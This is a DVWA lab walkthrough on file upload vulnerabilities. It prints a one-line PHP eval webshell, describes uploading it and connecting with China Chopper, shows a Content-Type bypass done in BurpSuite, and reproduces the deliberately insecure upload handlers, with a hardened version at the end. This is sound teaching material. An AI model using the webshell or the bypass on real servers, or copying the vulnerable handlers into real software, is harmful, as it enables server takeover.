Supplemented, corrected and updated from time to time; discussion and corrections are welcome.
Contents
- Overview
- LOW
  - Source
- MEDIUM
  - Source
- HIGH
  - Source
Overview
A file upload vulnerability arises when the programmer does not strictly validate and filter uploaded files, so a user can go beyond their own privileges and upload executable dynamic script files to the server. The uploaded file may be a trojan, a virus, a malicious script, a WebShell, and so on. This is the most direct and effective kind of attack. "File upload" is not a problem in itself; the problem is how the server handles and interprets the file after it has been uploaded. If the server's handling logic is not secure enough, the consequences are serious.
Original post: https://blog.csdn.net/qq_42636435/article/details/88096844
Environment:
win7: 192.168.126.135
kali: 192.168.126.129
owasp: 192.168.126.134
Tools: Chopper (China Chopper), BurpSuite
Trojan (webshell): <?php @eval($_POST['hacker']); ?>
LOW
Go to Upload and upload the file containing the trojan.
![](https://img.laitimes.com/img/9ZDMuAjOiMmIsIjOiQnIsICM38FdsYkRGZkRG9lcvx2bjxiNx8VZ6l2cs0TPn1kMRR0TyUFROBDOsJGcohVYsR2MMBjVtJWd0ckW65UbM5WOHJWa5kHT20ESjBjUIF2X0hXZ0xCMx81dvRWYoNHLrdEZwZ1Rh5WNXp1bwNjW1ZUba9VZwlHdssmch1mclRXY39CXldWYtlWPzNXZj9mcw1ycz9WL49zZuBnL5EDNwMDMyYTM3ADNwAjMwIzLc52YucWbp5GZzNmLn9Gbi1yZtl2Lc9CX6MHc0RHaiojIsJye.png)
Copy the directory path that the success message gives for the uploaded file, paste it into the address bar (remember to delete the trailing #), press Enter to reach the file's real path, and copy that.
On the win7 machine open Chopper, right-click > New, and enter the copied file path together with the password set in the trojan.
Logged in successfully!
Source
```php
<?php
if (isset($_POST['Upload'])) {
    // The destination is built straight from the client-supplied filename;
    // nothing about the extension, type or size is checked at this level.
    $target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
    $target_path = $target_path . basename( $_FILES['uploaded']['name']);
    if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
        echo '<pre>';
        echo 'Your image was not uploaded.';
        echo '</pre>';
    } else {
        echo '<pre>';
        echo $target_path . ' succesfully uploaded!';
        echo '</pre>';
    }
}
?>
```
MEDIUM
Looking at the source, the upload's type and size are now restricted: only image/jpeg is accepted. Note that merely renaming the file's extension does nothing here.
`if (($uploaded_type == "image/jpeg") && ($uploaded_size < 100000))`
This involves the MIME type (Multipurpose Internet Mail Extensions, the media type).
As expected, the upload does not succeed.
At this point a third-party tool can be used to change the MIME type declared for the trojan file to image/jpeg.
Using BurpSuite's proxy and intercept functions, intercept the HTTP request the browser sends to the server and modify it.
On the kali machine, for convenience, set the proxy directly in kali's browser to 127.0.0.1.
Start BurpSuite as the proxy; at launch it sometimes pops up a message about needing a JRE update, which can be ignored.
Once inside, ignore the update, accept the default configuration and go Next -> Start Burp.
Open the Proxy tab; while intercept is on, the DVWA upload page can be seen refreshing continuously in the top-left corner.
Change the value of the Content-Type: header to image/jpeg, then turn intercept off.
The upload succeeds, and the remaining steps are exactly the same as before.
Source
```php
<?php
if (isset($_POST['Upload'])) {
    $target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
    $target_path = $target_path . basename($_FILES['uploaded']['name']);
    $uploaded_name = $_FILES['uploaded']['name'];
    // 'type' is the Content-Type the client declared in the request,
    // not a property of the file's contents.
    $uploaded_type = $_FILES['uploaded']['type'];
    $uploaded_size = $_FILES['uploaded']['size'];
    if (($uploaded_type == "image/jpeg") && ($uploaded_size < 100000)){
        if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
            echo '<pre>';
            echo 'Your image was not uploaded.';
            echo '</pre>';
        } else {
            echo '<pre>';
            echo $target_path . ' succesfully uploaded!';
            echo '</pre>';
        }
    }
    else{
        echo '<pre>Your image was not uploaded.</pre>';
    }
}
?>
```
HIGH
Source
```php
<?php
if (isset($_POST['Upload'])) {
    $target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
    $target_path = $target_path . basename($_FILES['uploaded']['name']);
    $uploaded_name = $_FILES['uploaded']['name'];
    // Extension is everything after the last '.' in the client-supplied name;
    // the Content-Type header is no longer consulted.
    $uploaded_ext = substr($uploaded_name, strrpos($uploaded_name, '.') + 1);
    $uploaded_size = $_FILES['uploaded']['size'];
    if (($uploaded_ext == "jpg" || $uploaded_ext == "JPG" || $uploaded_ext == "jpeg" || $uploaded_ext == "JPEG") && ($uploaded_size < 100000)){
        if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
            echo '<pre>';
            echo 'Your image was not uploaded.';
            echo '</pre>';
        } else {
            echo '<pre>';
            echo $target_path . ' succesfully uploaded!';
            echo '</pre>';
        }
    }
    else{
        echo '<pre>';
        echo 'Your image was not uploaded.';
        echo '</pre>';
    }
}
?>
```
- Placeholder (to be filled in)
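For contrast with the three DVWA handlers above, here is an added example (my own code, not DVWA's) of a defensive version of the same upload handler: it ignores the client-supplied Content-Type that the MEDIUM walkthrough rewrites, lower-cases the extension before an allowlist check, sniffs and re-encodes the actual file bytes, and stores the result under a server-generated name. It assumes the same form field name `uploaded` and the same upload directory as the page's code; the function name `validate_image_upload` is my own.

```php
<?php
// Added defensive example (not DVWA's own code). Assumes the same form field
// name 'uploaded' and the same upload directory as the handlers above.
function validate_image_upload(array $file, string $target_dir): array {
    // Reject anything PHP already flagged as a failed or partial upload.
    if (!isset($file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
        return [false, 'Upload failed'];
    }
    // Same 100000-byte limit as the page, enforced on the server.
    if ($file['size'] >= 100000) {
        return [false, 'File too large'];
    }
    // Extension allowlist, lower-cased so JPG/Jpg/JpEg cannot slip past a literal compare.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!in_array($ext, ['jpg', 'jpeg'], true)) {
        return [false, 'Extension not allowed'];
    }
    // Never consult $file['type']: it is the client's Content-Type header and
    // can be rewritten in a proxy, as the MEDIUM walkthrough shows.
    // Sniff the bytes of the temporary file instead.
    $finfo = finfo_open(FILEINFO_MIME_TYPE);
    $sniffed = finfo_file($finfo, $file['tmp_name']);
    finfo_close($finfo);
    if ($sniffed !== 'image/jpeg') {
        return [false, 'Content is not a JPEG'];
    }
    // Re-encode through GD: the output is a fresh JPEG built from pixel data,
    // so bytes that are not image data in the original file do not survive.
    $img = @imagecreatefromjpeg($file['tmp_name']);
    if ($img === false) {
        return [false, 'Not a decodable image'];
    }
    // Server-generated name: the user-supplied filename never reaches disk.
    $target = rtrim($target_dir, '/') . '/' . bin2hex(random_bytes(16)) . '.jpg';
    $saved = imagejpeg($img, $target, 90);
    imagedestroy($img);
    return $saved ? [true, $target] : [false, 'Could not store file'];
}

if (isset($_POST['Upload'])) {
    [$ok, $result] = validate_image_upload($_FILES['uploaded'], DVWA_WEB_PAGE_TO_ROOT . 'hackable/uploads/');
    echo '<pre>' . htmlspecialchars($ok ? basename($result) . ' uploaded' : $result) . '</pre>';
}
?>
```

The upload directory should additionally be configured so the web server never executes scripts from it; that is a server configuration matter outside this snippet.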